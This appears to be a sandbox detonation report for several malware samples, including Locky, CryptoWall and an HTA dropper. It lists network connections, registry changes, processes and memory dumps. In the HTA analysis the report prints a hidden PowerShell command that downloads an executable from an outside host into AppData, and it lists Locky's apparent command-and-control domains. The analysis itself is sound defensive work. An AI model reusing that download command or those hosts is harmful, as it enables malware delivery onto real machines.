| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| DE | 116.202.120.165:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| DE | 116.202.120.166:443 | tcp | |
| DE | 116.202.120.166:443 | tcp | |
| DE | 116.202.120.166:443 | tcp |
Files
memory/1700-0-0x000007FEF54DE000-0x000007FEF54DF000-memory.dmp
memory/1700-2-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-1-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-3-0x000000001ADD0000-0x000000001AE22000-memory.dmp
memory/1700-4-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-10-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-11-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-12-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-13-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-14-0x000007FEF54DE000-0x000007FEF54DF000-memory.dmp
memory/1700-15-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-16-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
memory/1700-17-0x000007FEF5220000-0x000007FEF5BBD000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1924 wrote to memory of 2248 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1924 wrote to memory of 2248 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1924 wrote to memory of 2248 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2248 wrote to memory of 2880 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2248 wrote to memory of 2880 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2248 wrote to memory of 2880 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2248 wrote to memory of 2880 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Ransomware-master\etc\load.sh"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 6a0e30ffa8311f0f499c0963dbd25138 |
| SHA1 | e8ab85c0a943f6b59775a343374cd7c22d3769df |
| SHA256 | 1f88fc18b9ee5672baf95815c344320a079727c47c5c67052c8052459e693b0c |
| SHA512 | a2a223a76c907c1bcb95512c69c1618f534382a4ae4397d5b399afbca8b7004424fbf67331af7ccca0fd3f833c860e959983bf074c952205db7326a235193816 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20241010-en
Max time kernel
141s
Max time network
145s
Command Line
Signatures
Locky
Locky family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Locky.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Locky.exe
"C:\Users\Admin\AppData\Local\Temp\Locky.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | embavssrrfvukl.in | udp |
| US | 8.8.8.8:53 | rcbquc.ru | udp |
| US | 8.8.8.8:53 | frxdrjrjd.de | udp |
| US | 8.8.8.8:53 | weaaspoo.in | udp |
| US | 8.8.8.8:53 | ktwmpwuncbi.fr | udp |
| US | 8.8.8.8:53 | cjpqsuatmo.tf | udp |
| IE | 86.104.134.144:80 | tcp | |
| IE | 86.104.134.144:80 | tcp | |
| IE | 86.104.134.144:80 | tcp |
Files
memory/2324-0-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2324-1-0x0000000000220000-0x0000000000224000-memory.dmp
memory/2324-2-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2324-4-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2324-5-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2324-8-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2324-10-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2324-11-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2324-13-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2324-14-0x0000000000400000-0x00000000007D1000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\131.exe
"C:\Users\Admin\AppData\Local\Temp\131.exe"
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win7-20240903-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1152 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1152 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1152 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 1152 wrote to memory of 2532 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\54387.exe');
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | french-cooking.com | udp |
| FR | 54.36.91.62:80 | french-cooking.com | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-28 22:32
Reported
2024-11-28 22:35
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
135s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cryptowall.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\cryptowall.exe
"C:\Users\Admin\AppData\Local\Temp\cryptowall.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 848 -ip 848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 484
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
